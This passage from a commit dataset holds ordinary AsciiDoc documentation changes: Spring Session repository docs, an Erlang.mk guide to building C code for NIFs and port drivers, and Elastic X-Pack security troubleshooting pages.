`spring:session:channel:created:33fdd1b6-b496-4b33-9f7d-df96679d32fe`,\nwhere `33fdd1b6-b496-4b33-9f7d-df96679d32fe` is the session id. 
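For example, assuming the default namespace, you could watch these messages with `redis-cli` (a hypothetical sketch using pattern subscription; Spring Session's listener container normally consumes them for you):\n\n[source,bash]\n----\nredis-cli psubscribe \"spring:session:channel:created:*\"\n----\n\n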
The body of the event will be the session that was created.\n\nIf registered as a `MessageListener` (the default), `RedisOperationsSessionRepository` will then translate the Redis message into a `SessionCreatedEvent`.\n\n[[api-redisoperationssessionrepository-cli]]\n==== Viewing the Session in Redis\n\nAfter http:\/\/redis.io\/topics\/quickstart[installing redis-cli], you can inspect the values in Redis http:\/\/redis.io\/commands#hash[using the redis-cli].\nFor example, enter the following into a terminal:\n\n[source,bash]\n----\n$ redis-cli\nredis 127.0.0.1:6379> keys *\n1) \"spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021\" <1>\n2) \"spring:session:expirations:1418772300000\" <2>\n----\n\n<1> The suffix of this key is the session identifier of the Spring Session.\n<2> This key contains all the session ids that should be deleted at the time `1418772300000`.\n\nYou can also view the attributes of each session.\n\n[source,bash]\n----\nredis 127.0.0.1:6379> hkeys spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021\n1) \"lastAccessedTime\"\n2) \"creationTime\"\n3) \"maxInactiveInterval\"\n4) \"sessionAttr:username\"\nredis 127.0.0.1:6379> hget spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021 sessionAttr:username\n\"\\xac\\xed\\x00\\x05t\\x00\\x03rob\"\n----\n\n[[api-gemfireoperationssessionrepository]]\n=== GemFireOperationsSessionRepository\n\n`GemFireOperationsSessionRepository` is a `SessionRepository` that is implemented using Spring Data's `GemfireOperations`.\nIn a web environment, this is typically used in combination with `SessionRepositoryFilter`.\nThe implementation supports `SessionDestroyedEvent` and `SessionCreatedEvent` through `SessionMessageListener`.\n\n[[api-gemfireoperationssessionrepository-indexing]]\n==== Using Indexes with GemFire\n\nWhile best practices concerning the proper definition of indexes that positively impact GemFire's performance are beyond\nthe scope of this document, it is important to realize that Spring Session Data GemFire creates and uses indexes to\nquery and find Sessions efficiently.\n\nOut-of-the-box, Spring Session Data GemFire creates one Hash-typed Index on the principal name. There are two different built-in\nstrategies for finding the principal name. The first strategy is that the value of the session attribute with the name\n`FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME` will be indexed to the same index name. For example:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyindexname-set]\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyindexname-get]\n----\n\n[[api-gemfireoperationssessionrepository-indexing-security]]\n==== Using Indexes with GemFire & Spring Security\n\nAlternatively, Spring Session Data GemFire will map Spring Security's current `Authentication#getName()` to the index\n`FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME`. 
For example, if you are using Spring Security you can\nfind the current user's sessions using:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyspringsecurityindexname-context]\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyspringsecurityindexname-get]\n----\n\n[[api-gemfireoperationssessionrepository-indexing-custom]]\n==== Using Custom Indexes with GemFire\n\nThis enables developers using the `GemFireOperationsSessionRepository` to programmatically query and find all Sessions\nwith a given principal name efficiently.\n\nAdditionally, Spring Session Data GemFire will create a Range-based Index on the implementing Session's Map-type\n`attributes` property (i.e. on any arbitrary Session attribute) when a developer identifies one or more named Session\nattributes that should be indexed by GemFire.\n\nSession attributes to index can be specified with the `indexableSessionAttributes` attribute on the `@EnableGemFireHttpSession`\nannotation. A developer adds this annotation to their Spring application `@Configuration` class when they wish to\nenable Spring Session support for HttpSession backed by GemFire.\n\nFor example, the following configuration:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/GemFireHttpSessionConfig.java[tags=class-start]\n\t\/\/ ...\n}\n----\n\nwill allow searching for sessions using the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/HttpSessionGemFireIndexingCustomITests.java[tags=findbyindexname-set]\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/HttpSessionGemFireIndexingCustomITests.java[tags=findbyindexname-get]\n----\n\nNOTE: Only Session attribute names identified in the `@EnableGemFireHttpSession` annotation's `indexableSessionAttributes`\nattribute will have an Index defined. All other Session attributes will not be indexed.\n\nHowever, there is one caveat. Any values stored in indexable Session attributes must implement the `java.lang.Comparable<T>`\ninterface. If those object values do not implement `Comparable`, then GemFire will throw an error on startup when the\nIndex is defined for Regions with persistent Session data, or when an attempt is made at runtime to assign the indexable\nSession attribute a value that is not `Comparable` and the Session is saved to GemFire.\n\nNOTE: Any Session attribute that is not indexed may store non-`Comparable` values.\n\nTo learn more about GemFire's Range-based Indexes, see http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/query_index\/creating_map_indexes.html[Creating Indexes on Map Fields].\n\nTo learn more about GemFire Indexing in general, see http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/query_index\/query_index.html[Working with Indexes].\n\n\n[[api-mapsessionrepository]]\n=== MapSessionRepository\n\nThe `MapSessionRepository` allows for persisting `ExpiringSession` in a `Map` with the key being the `ExpiringSession` id and the value being the `ExpiringSession`.\nThe implementation can be used with a `ConcurrentHashMap` as a testing or convenience mechanism.\nAlternatively, it can be used with distributed `Map` implementations. 
For example, it can be used with Hazelcast.\n\n[[api-mapsessionrepository-new]]\n==== Instantiating MapSessionRepository\n\nCreating a new instance is as simple as:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=new-mapsessionrepository]\n----\n\n[[api-mapsessionrepository-hazelcast]]\n==== Using Spring Session and Hazelcast\n\nThe <<samples,Hazelcast Sample>> is a complete application demonstrating using Spring Session with Hazelcast.\n\nTo run it, use the following:\n\n\t.\/gradlew :samples:hazelcast:tomcatRun\n\nThe <<samples,Hazelcast Spring Sample>> is a complete application demonstrating using Spring Session with Hazelcast and Spring Security.\n\nIt includes example Hazelcast `MapListener` implementations that support firing `SessionCreatedEvent`, `SessionDeletedEvent` and `SessionExpiredEvent`.\n\nTo run it, use the following:\n\n\t.\/gradlew :samples:hazelcast-spring:tomcatRun\n\n[[community]]\n== Spring Session Community\n\nWe are glad to consider you a part of our community.\nPlease find additional information below.\n\n[[community-support]]\n=== Support\n\nYou can get help by asking questions on http:\/\/stackoverflow.com\/questions\/tagged\/spring-session[StackOverflow with the tag spring-session].\nSimilarly, we encourage helping others by answering questions on StackOverflow.\n\n[[community-source]]\n=== Source Code\n\nOur source code can be found on GitHub at https:\/\/github.com\/spring-projects\/spring-session\/\n\n[[community-issues]]\n=== Issue Tracking\n\nWe track issues in GitHub Issues at https:\/\/github.com\/spring-projects\/spring-session\/issues\n\n[[community-contributing]]\n=== Contributing\n\nWe appreciate https:\/\/help.github.com\/articles\/using-pull-requests\/[Pull Requests].\n\n[[community-license]]\n=== License\n\nSpring Session is Open Source software released under the http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache 2.0 license].\n\n[[minimum-requirements]]\n== Minimum Requirements\n\nThe minimum requirements for Spring Session are:\n\n* Java 5+\n* If you are running in a Servlet Container (not required), Servlet 2.5+\n* If you are using other Spring libraries (not required), the minimum required version is Spring 3.2.14.\nWhile we re-run all unit tests against Spring 3.2.x, we recommend using the latest Spring 4.x version when possible.\n* `@EnableRedisHttpSession` requires Redis 2.8+. 
This is necessary to support <<api-redisoperationssessionrepository-expiration,Session Expiration>>\n\n[NOTE]\n====\nAt its core Spring Session only has a required dependency on commons-logging.\nFor an example of using Spring Session without any other Spring dependencies, refer to the <<samples,hazelcast sample>> application.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a751fdc0795b7ddb7d66d0f6a6d4f98e9dbeb04c","subject":"Update 2016-12-12-Heroku-Memo-for-postresql.adoc","message":"Update 2016-12-12-Heroku-Memo-for-postresql.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2016-12-12-Heroku-Memo-for-postresql.adoc","new_file":"_posts\/2016-12-12-Heroku-Memo-for-postresql.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"55699eeab57a79fada0bd6dd222cd1218482e0d2","subject":"Add trick for exporting C build flags to sub-Makefiles","message":"Add trick for exporting C build flags to sub-Makefiles\n\nThanks to dozzie on IRC for the suggestion.\n","repos":"jj1bdx\/erlang.mk,rabbitmq\/erlang.mk,ninenines\/erlang.mk,crownedgrouse\/erlang.mk","old_file":"doc\/src\/guide\/ports.asciidoc","new_file":"doc\/src\/guide\/ports.asciidoc","new_contents":"[[ports]]\n== NIFs and port drivers\n\nErlang.mk can not only build Erlang projects, but also the C code\nthat some projects come with, like NIFs and port drivers.\n\nThere are two ways to build the C code: using a custom Makefile,\nor making Erlang.mk do it directly. The C code will be built\nas needed when you run `make`.\n\n\/\/ @todo something for easier bootstrapping\n\n=== C source code location and Erlang environment\n\nThe C source code should be located in the '$(C_SRC_DIR)' directory.\nIt defaults to 'c_src\/'. Should you need to modify it, all you\nneed to do is to set the variable in your Makefile before including\nErlang.mk:\n\n[source,make]\nC_SRC_DIR = $(CURDIR)\/my_nif_source\n\nWhen this directory exists, Erlang.mk will automatically create a\nfile named '$(C_SRC_ENV)'. This file defaults to '$(C_SRC_DIR)\/env.mk'.\nThis can also be changed:\n\n[source,make]\nC_SRC_ENV = $(C_SRC_DIR)\/erlang_env.mk\n\nIt contains a few variable definitions for the environment used for the build:\n\n`ERTS_INCLUDE_DIR`::\n\tPath to the ERTS include files ('erl_driver.h', 'erl_nif.h' and more).\n`ERL_INTERFACE_INCLUDE_DIR`::\n\tPath to the Erl_Interface include files ('ei.h' and related).\n`ERL_INTERFACE_LIB_DIR`::\n\tPath to the Erl_Interface static libraries.\n\n=== Using a custom Makefile\n\nErlang.mk will automatically run `make` if it detects a Makefile\nin '$(C_SRC_DIR)\/Makefile'.\n\nThe Makefile should have at least two targets: a default target\n(which can be anything, for example `all`) which is invoked when\nbuilding the C code, and a `clean` target invoked when cleaning\nit.\n\nYou can include the 'env.mk' file to benefit from the Erlang\nenvironment detection:\n\n[source,make]\ninclude env.mk\n\n=== Using Erlang.mk directly\n\nYou don't need to write a Makefile to build C source code, however.\nErlang.mk comes with rules to build both shared libraries and\nexecutables, using the source files it finds in '$(C_SRC_DIR)'.\n\nBy default, Erlang.mk will create a shared library. 
To change\nthis and create an executable instead, put this in your Makefile\nbefore including Erlang.mk:\n\n[source,make]\nC_SRC_TYPE = executable\n\nThe generated file name varies depending on the type of project\nyou have (shared library or executable) and on the platform you\nbuild the project on.\n\nFor shared libraries, the generated file name will be\n'$(C_SRC_OUTPUT)$(C_SRC_SHARED_EXTENSION)', with the default\nbeing '$(CURDIR)\/priv\/$(PROJECT)' followed by the extension:\n`.dll` on Windows, `.so` everywhere else.\n\nFor executables, the generated file name is\n'$(C_SRC_OUTPUT)$(C_SRC_EXECUTABLE_EXTENSION)', with the same\ndefault except for the extension: `.exe` on Windows, and otherwise\nnothing.\n\nErlang.mk sets appropriate compile and linker flags by default.\nThese flags vary depending on the platform, and can of course\nbe overridden.\n\n`CC`::\n\tThe compiler to be used.\n`CFLAGS`::\n\tC compiler flags.\n`CXXFLAGS`::\n\tC++ compiler flags.\n`LDFLAGS`::\n\tLinker flags.\n`LDLIBS`::\n\tLibraries to link against.\n\nThe source files are automatically gathered from the contents\nof '$(C_SRC_DIR)'. Erlang.mk looks for '.c', '.C', '.cc' and '.cpp'\nsource files. You can define the variable `SOURCES` to manually\nlist the files to compile.\n\n=== Propagating compile and linker flags to sub-Makefiles\n\nIn some cases, it might be necessary to propagate the flags\nyou just defined to the sub-Makefiles of your local project.\nYou generally can't just export those as this could impact\nthe building of dependencies.\n\nMakefiles allow you to export variables for specific targets.\nWhen doing this, the variables will be exported only when\nthis target runs, and not for other targets. It is therefore\npossible to export them when building the C code without\nimpacting other build steps.\n\nBy adding this to your Makefile, all five variables will be\nmade available to sub-Makefiles when building C code:\n\n[source,make]\n----\napp-c_src: export CC +=\napp-c_src: export CFLAGS +=\napp-c_src: export CPPFLAGS +=\napp-c_src: export LDFLAGS +=\napp-c_src: export LDLIBS +=\n----\n\nAppending an empty string to the existing value is necessary\nbecause Makefiles expect an assignment for target-specific\nexports. Alternatively, you can set a new value:\n\n[source,make]\n----\napp-c_src: export CFLAGS = -O3\n----\n","old_contents":"[[ports]]\n== NIFs and port drivers\n\nErlang.mk can not only build Erlang projects, but also the C code\nthat some projects come with, like NIFs and port drivers.\n\nThere are two ways to build the C code: using a custom Makefile,\nor making Erlang.mk do it directly. The C code will be built\nas needed when you run `make`.\n\n\/\/ @todo something for easier bootstrapping\n\n=== C source code location and Erlang environment\n\nThe C source code should be located in the '$(C_SRC_DIR)' directory.\nIt defaults to 'c_src\/'. Should you need to modify it, all you\nneed to do is to set the variable in your Makefile before including\nErlang.mk:\n\n[source,make]\nC_SRC_DIR = $(CURDIR)\/my_nif_source\n\nWhen this directory exists, Erlang.mk will automatically create a\nfile named '$(C_SRC_ENV)'. 
This file defaults to '$(C_SRC_DIR)\/env.mk'.\nThis can also be changed:\n\n[source,make]\nC_SRC_ENV = $(C_SRC_DIR)\/erlang_env.mk\n\nIt contains a few variable definitions for the environment used for the build:\n\n`ERTS_INCLUDE_DIR`::\n\tPath to the ERTS include files ('erl_driver.h', 'erl_nif.h' and more).\n`ERL_INTERFACE_INCLUDE_DIR`::\n\tPath to the Erl_Interface include files ('ei.h' and related).\n`ERL_INTERFACE_LIB_DIR`::\n\tPath to the Erl_Interface static libraries.\n\n=== Using a custom Makefile\n\nErlang.mk will automatically run `make` if it detects a Makefile\nin '$(C_SRC_DIR)\/Makefile'.\n\nThe Makefile should have at least two targets: a default target\n(which can be anything, for example `all`) which is invoked when\nbuilding the C code, and a `clean` target invoked when cleaning\nit.\n\nYou can include the 'env.mk' file to benefit from the Erlang\nenvironment detection:\n\n[source,make]\ninclude env.mk\n\n=== Using Erlang.mk directly\n\nYou don't need to write a Makefile to build C source code, however.\nErlang.mk comes with rules to build both shared libraries and\nexecutables, using the source files it finds in '$(C_SRC_DIR)'.\n\nBy default, Erlang.mk will create a shared library. To change\nthis and create an executable instead, put this in your Makefile\nbefore including Erlang.mk:\n\n[source,make]\nC_SRC_TYPE = executable\n\nThe generated file name varies depending on the type of project\nyou have (shared library or executable) and on the platform you\nbuild the project on.\n\nFor shared libraries, the generated file name will be\n'$(C_SRC_OUTPUT)$(C_SRC_SHARED_EXTENSION)', with the default\nbeing '$(CURDIR)\/priv\/$(PROJECT)' followed by the extension:\n`.dll` on Windows, `.so` everywhere else.\n\nFor executables, the generated file name is\n'$(C_SRC_OUTPUT)$(C_SRC_EXECUTABLE_EXTENSION)', with the same\ndefault except for the extension: `.exe` on Windows, and otherwise\nnothing.\n\nErlang.mk sets appropriate compile and linker flags by default.\nThese flags vary depending on the platform, and can of course\nbe overriden.\n\n`CC`::\n\tThe compiler to be used.\n`CFLAGS`::\n\tC compiler flags.\n`CXXFLAGS`::\n\tC++ compiler flags.\n`LDFLAGS`::\n\tLinker flags.\n`LDLIBS`::\n\tLibraries to link against.\n\nThe source files are automatically gathered from the contents\nof '$(C_SRC_DIR)'. Erlang.mk looks for '.c', '.C', '.cc' and '.cpp'\nsource files. 
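For reference, the automatic detection behaves roughly like the following sketch (an approximation for illustration, not the exact rule Erlang.mk uses internally):\n\n[source,make]\nSOURCES := $(shell find $(C_SRC_DIR) -type f \\( -name \"*.c\" -o -name \"*.C\" -o -name \"*.cc\" -o -name \"*.cpp\" \\))\n\n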
You can define the variable `SOURCES` to manually\nlist the files to compile.\n","returncode":0,"stderr":"","license":"isc","lang":"AsciiDoc"} {"commit":"2f9798025ddd34e8aa147699e85a76d87024ddcb","subject":"[DOCS] Reformatted security troubleshooting pages (elastic\/x-pack-elasticsearch#2799)","message":"[DOCS] Reformatted security troubleshooting pages (elastic\/x-pack-elasticsearch#2799)\n\nOriginal commit: elastic\/x-pack-elasticsearch@b10c822ba25bafa20920aa010191b8bc08ecc14b\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/en\/security\/troubleshooting.asciidoc","new_file":"docs\/en\/security\/troubleshooting.asciidoc","new_contents":"[[security-troubleshooting]]\n== {security} Troubleshooting\n\nUse the information in this section to troubleshoot common problems and find\nanswers for frequently asked questions.\n\n* <<security-trb-settings>>\n* <<security-trb-roles>>\n* <<security-trb-extraargs>>\n* <<trouble-shoot-active-directory>>\n* <<trb-security-maccurl>>\n* <<trb-security-sslhandshake>>\n* <<trb-security-ssl>>\n* <<trb-security-internalserver>>\n\n\nTo get help, see <<xpack-help>>.\n\n[[security-trb-settings]]\n=== Some settings are not returned via the nodes settings API\n\n*Symptoms:*\n\n* When you use the {ref}\/cluster-nodes-info.html[nodes info API] to retrieve\nsettings for a node, some information is missing.\n\n*Resolution:*\n\nThis is intentional. Some of the settings are considered to be highly\nsensitive: all `ssl` settings, ldap `bind_dn`, and `bind_password`.\nFor this reason, we filter these settings and do not expose them via\nthe nodes info API rest endpoint. You can also define additional\nsensitive settings that should be hidden using the\n`xpack.security.hide_settings` setting. For example, this snippet\nhides the `url` settings of the `ldap1` realm and all settings of the\n`ad1` realm.\n\n[source, yaml]\n------------------------------------------\nxpack.security.hide_settings: xpack.security.authc.realms.ldap1.url,\nxpack.security.authc.realms.ad1.*\n------------------------------------------\n\n[[security-trb-roles]]\n=== Authorization exceptions\n\n*Symptoms:*\n\n* I configured the appropriate roles and the users, but I still get an\nauthorization exception.\n* I can authenticate to LDAP, but I still get an authorization exception.\n\n\n*Resolution:*\n\n. Verify that the role names associated with the users match the roles defined\nin the `roles.yml` file. You can use the `users` tool to list all the users. Any\nunknown roles are marked with `*`.\n+\n--\n[source, shell]\n------------------------------------------\nbin\/xpack\/users list\nrdeniro : admin\nalpacino : power_user\njacknich : monitoring,unknown_role* <1>\n------------------------------------------\n<1> `unknown_role` was not found in `roles.yml`\n\nFor more information about this command, see\n{ref}\/users-command.html[Users Command].\n--\n\n. If you are authenticating to LDAP, a number of configuration options can cause\nthis error.\n+\n--\n|======================\n|_group identification_ |\n\nGroups are located by either an LDAP search or by the \"memberOf\" attribute on\nthe user. Also, If subtree search is turned off, it will search only one\nlevel deep. 
See the <<ldap-settings, LDAP Settings>> for all the options.\nThere are many options here and sticking to the defaults will not work for all\nscenarios.\n\n| _group to role mapping_|\n\nEither the `role_mapping.yml` file or the location for this file could be\nmisconfigured. See <<security-files, Security Files>> for more.\n\n|_role definition_|\n\nThe role definition might be missing or invalid.\n\n|======================\n\nTo help track down these possibilities, add the following lines to the end of\nthe `log4j2.properties` configuration file in the `CONFIG_DIR`:\n\n[source,properties]\n----------------\nlogger.authc.name = org.elasticsearch.xpack.security.authc\nlogger.authc.level = DEBUG\n----------------\n\nA successful authentication should produce debug statements that list groups and\nrole mappings.\n--\n\n[[security-trb-extraargs]]\n=== Users command fails due to extra arguments\n\n*Symptoms:*\n\n* The `users` command fails with the following message:\n`ERROR: extra arguments [...] were provided`.\n\n*Resolution:*\n\nThis error occurs when the `users` tool is parsing the input and finds\nunexpected arguments. This can happen when there are special characters used in\nsome of the arguments. For example, on Windows systems the `,` character is\nconsidered a parameter separator; in other words `-r role1,role2` is translated\nto `-r role1 role2` and the `users` tool only recognizes `role1` as an expected\nparameter. The solution here is to quote the parameter: `-r \"role1,role2\"`.\n\nFor more information about this command, see\n{ref}\/users-command.html[Users Command].\n\n[[trouble-shoot-active-directory]]\n=== Users are frequently locked out of Active Directory\n\n*Symptoms:*\n\n* Certain users are being frequently locked out of Active Directory.\n\n*Resolution:*\n\nCheck your realm configuration; realms are checked serially, one after another.\nIf your Active Directory realm is being checked before other realms and there\nare usernames that appear in both Active Directory and another realm, a valid\nlogin for one realm might be causing failed login attempts in another realm.\n\nFor example, if `UserA` exists in both Active Directory and a file realm, and\nthe Active Directory realm is checked first and file is checked second, an\nattempt to authenticate as `UserA` in the file realm would first attempt to\nauthenticate against Active Directory and fail, before successfully\nauthenticating against the `file` realm. Because authentication is verified on\neach request, the Active Directory realm would be checked - and fail - on each\nrequest for `UserA` in the `file` realm. In this case, while the authentication\nrequest completed successfully, the account on Active Directory would have\nreceived several failed login attempts, and that account might become\ntemporarily locked out. Plan the order of your realms accordingly.\n\nAlso note that it is not typically necessary to define multiple Active Directory\nrealms to handle domain controller failures. 
When using Microsoft DNS, the DNS\nentry for the domain should always point to an available domain controller.\n\n\n[[trb-security-maccurl]]\n=== Certificate verification fails for curl on Mac\n\n*Symptoms:*\n\n* `curl` on the Mac returns a certificate verification error even when the\n`--cacert` option is used.\n\n\n*Resolution:*\n\nApple's integration of `curl` with their keychain technology disables the\n`--cacert` option.\nSee http:\/\/curl.haxx.se\/mail\/archive-2013-10\/0036.html for more information.\n\nYou can use another tool, such as `wget`, to test certificates. Alternatively, you\ncan add the certificate for the signing certificate authority to the MacOS system\nkeychain, using a procedure similar to the one detailed at the\nhttp:\/\/support.apple.com\/kb\/PH14003[Apple knowledge base]. Be sure to add the\nsigning CA's certificate and not the server's certificate.\n\n\n[[trb-security-sslhandshake]]\n=== SSLHandshakeException causes connections to fail\n\n*Symptoms:*\n\n* An `SSLHandshakeException` causes a connection to a node to fail and indicates\nthat there is a configuration issue. Some of the common exceptions are shown\nbelow with tips on how to resolve these issues.\n\n\n*Resolution:*\n\n`java.security.cert.CertificateException: No name matching node01.example.com found`::\n+\n--\nIndicates that a client connection was made to `node01.example.com` but the\ncertificate returned did not contain the name `node01.example.com`. In most\ncases, the issue can be resolved by ensuring the name is specified during\ncertificate creation. For more information, see <<ssl-tls>>. Another scenario is\nwhen the environment does not wish to use DNS names in certificates at all. In\nthis scenario, all settings in `elasticsearch.yml` should only use IP addresses,\nincluding the `network.publish_host` setting.\n--\n\n`java.security.cert.CertificateException: No subject alternative names present`::\n+\n--\nIndicates that a client connection was made to an IP address but the returned\ncertificate did not contain any `SubjectAlternativeName` entries. IP addresses\nare only used for hostname verification if they are specified as a\n`SubjectAlternativeName` during certificate creation. If the intent was to use\nIP addresses for hostname verification, then the certificate will need to be\nregenerated with the appropriate IP address. See <<ssl-tls>>.\n--\n\n`javax.net.ssl.SSLHandshakeException: null cert chain` and `javax.net.ssl.SSLException: Received fatal alert: bad_certificate`::\n+\n--\nThe `SSLHandshakeException` indicates that a self-signed certificate was\nreturned by the client that is not trusted as it cannot be found in the\n`truststore` or `keystore`. This `SSLException` is seen on the client side of\nthe connection.\n--\n\n`sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target` and `javax.net.ssl.SSLException: Received fatal alert: certificate_unknown`::\n+\n--\nThis `SunCertPathBuilderException` indicates that a certificate was returned\nduring the handshake that is not trusted. This message is seen on the client\nside of the connection. The `SSLException` is seen on the server side of the\nconnection. The CA certificate that signed the returned certificate was not\nfound in the `keystore` or `truststore` and needs to be added to trust this\ncertificate.\n--\n\n[[trb-security-ssl]]\n=== Common SSL\/TLS exceptions\n\n*Symptoms:*\n\n* You might see some exceptions related to SSL\/TLS in your logs. 
Some of the\ncommon exceptions are shown below with tips on how to resolve these issues. +\n\n\n\n*Resolution:*\n\n`WARN: received plaintext http traffic on a https channel, closing connection`::\n+\n--\nIndicates that there was an incoming plaintext http request. This typically\noccurs when an external application attempts to make an unencrypted call to the\nREST interface. Please ensure that all applications are using `https` when\ncalling the REST interface with SSL enabled.\n--\n\n`org.elasticsearch.common.netty.handler.ssl.NotSslRecordException: not an SSL\/TLS record:`::\n+\n--\nIndicates that there was incoming plaintext traffic on an SSL connection. This\ntypically occurs when a node is not configured to use encrypted communication\nand tries to connect to nodes that are using encrypted communication. Please\nverify that all nodes are using the same setting for\n`xpack.security.transport.ssl.enabled`.\n\nFor more information about this setting, see\n{ref}\/security-settings.html[Security Settings in {es}].\n--\n\n`java.io.StreamCorruptedException: invalid internal transport message format, got`::\n+\n--\nIndicates an issue with data received on the transport interface in an unknown\nformat. This can happen when a node with encrypted communication enabled\nconnects to a node that has encrypted communication disabled. Please verify that\nall nodes are using the same setting for `xpack.security.transport.ssl.enabled`.\n\nFor more information about this setting, see\n{ref}\/security-settings.html[Security Settings in {es}].\n--\n\n`java.lang.IllegalArgumentException: empty text`::\n+\n--\nThis exception is typically seen when an `https` request is made to a node that\nis not using `https`. If `https` is desired, please ensure the following setting\nis in `elasticsearch.yml`:\n\n[source,yaml]\n----------------\nxpack.security.http.ssl.enabled: true\n----------------\n\nFor more information about this setting, see\n{ref}\/security-settings.html[Security Settings in {es}].\n--\n\n`ERROR: unsupported ciphers [...] were requested but cannot be used in this JVM`::\n+\n--\nThis error occurs when an SSL\/TLS cipher suite is specified that cannot be supported\nby the JVM that {es} is running in. Security tries to use the specified cipher\nsuites that are supported by this JVM. This error can occur when using the\nSecurity defaults as some distributions of OpenJDK do not enable the PKCS11\nprovider by default. In this case, we recommend consulting your JVM\ndocumentation for details on how to enable the PKCS11 provider.\n\nAnother common source of this error is requesting cipher suites that use\nencryption with a key length greater than 128 bits when running on an Oracle JDK.\nIn this case, you must install the\n<<ciphers, JCE Unlimited Strength Jurisdiction Policy Files>>.\n--\n\n[[trb-security-internalserver]]\n=== Internal Server Error in Kibana\n\n*Symptoms:*\n\n* In 5.1.1, an `UnhandledPromiseRejectionWarning` occurs and {kib} displays an\nInternal Server Error.\n\/\/TBD: Is the same true for later releases?\n\n*Resolution:*\n\nIf the Security plugin is enabled in {es} but disabled in {kib}, you must\nstill set `elasticsearch.username` and `elasticsearch.password` in `kibana.yml`.\nOtherwise, {kib} cannot connect to {es}.\n","old_contents":"[[security-troubleshooting]]\n== {security} Troubleshooting\n\n[float]\n=== `settings`\n\nSome settings are not returned via the nodes settings API::\n+\n--\nThis is intentional. 
Some of the settings are considered to be highly\nsensitive: all `ssl` settings, ldap `bind_dn`, `bind_password`.\nFor this reason, we filter these settings and do not expose them via\nthe nodes info API rest endpoint. You can also define additional\nsensitive settings that should be hidden using the\n`xpack.security.hide_settings` setting. For example, this snippet\nhides the `url` settings of the `ldap1` realm and all settings of the\n`ad1` realm.\n\n[source, yaml]\n------------------------------------------\nxpack.security.hide_settings: xpack.security.authc.realms.ldap1.url, xpack.security.authc.realms.ad1.*\n------------------------------------------\n\n--\n\n[float]\n=== `users`\n\nI configured the appropriate roles and the users, but I still get an authorization exception::\n+\n--\nVerify that the role names associated with the users match the roles defined in the `roles.yml` file. You\ncan use the `users` tool to list all the users. Any unknown roles are marked with `*`.\n\n[source, shell]\n------------------------------------------\nbin\/xpack\/users list\nrdeniro : admin\nalpacino : power_user\njacknich : monitoring,unknown_role* <1>\n------------------------------------------\n<1> `unknown_role` was not found in `roles.yml`\n--\n\nERROR: extra arguments [...] were provided::\n+\n--\nThis error occurs when the `users` tool is parsing the input and finds unexpected arguments. This can happen when there\nare special characters used in some of the arguments. For example, on Windows systems the `,` character is considered\na parameter separator; in other words `-r role1,role2` is translated to `-r role1 role2` and the `users` tool only recognizes\n`role1` as an expected parameter. The solution here is to quote the parameter: `-r \"role1,role2\"`.\n--\n\n[[trouble-shoot-active-directory]]\n[float]\n=== Active Directory\n\nCertain users are being frequently locked out of Active Directory::\n+\n--\nCheck your realm configuration; realms are checked serially, one after another. If your Active Directory realm is being checked before other realms and there are usernames\nthat appear in both Active Directory and another realm, a valid login for one realm may be causing failed login attempts in another realm.\n\nFor example, if `UserA` exists in both Active Directory and a file realm, and the Active Directory realm is checked first and\nfile is checked second, an attempt to authenticate as `UserA` in the file realm would first attempt to authenticate\nagainst Active Directory and fail, before successfully authenticating against the `file` realm. Because authentication is\nverified on each request, the Active Directory realm would be checked - and fail - on each request for `UserA` in the `file`\nrealm. In this case, while the authentication request completed successfully, the account on Active Directory would have received\nseveral failed login attempts, and that account may become temporarily locked out. Plan the order of your realms accordingly.\n\nAlso note that it is not typically necessary to define multiple Active Directory realms to handle domain controller failures. When using Microsoft DNS, the DNS entry for the domain should always point to an available domain controller.\n--\n\n[float]\n=== LDAP\n\nI can authenticate to LDAP, but I still get an authorization exception::\n+\n--\nA number of configuration options can cause this error.\n\n|======================\n|_group identification_ |\n\nGroups are located by either an LDAP search or by the \"memberOf\" attribute on\nthe user. 
Also, if subtree search is turned off, it will search only one\nlevel deep. See the <<ldap-settings, LDAP Settings>> for all the options.\nThere are many options here and sticking to the defaults will not work for all\nscenarios.\n\n| _group to role mapping_|\n\nEither the `role_mapping.yml` file or the location for this file could be\nmisconfigured. See <<security-files, Security Files>> for more.\n\n|_role definition_|\n\nThe role definition may be missing or invalid.\n\n|======================\n\nTo help track down these possibilities, add the following lines to the end of the `log4j2.properties` configuration file in the\n`CONFIG_DIR`:\n\n[source,properties]\n----------------\nlogger.authc.name = org.elasticsearch.xpack.security.authc\nlogger.authc.level = DEBUG\n----------------\n\nA successful authentication should produce debug statements that list groups and role mappings.\n--\n\n\n[float]\n=== Encryption & Certificates\n\n`curl` on the Mac returns a certificate verification error even when the `--cacert` option is used::\n+\n--\nApple's integration of `curl` with their keychain technology disables the `--cacert` option.\nSee http:\/\/curl.haxx.se\/mail\/archive-2013-10\/0036.html for more 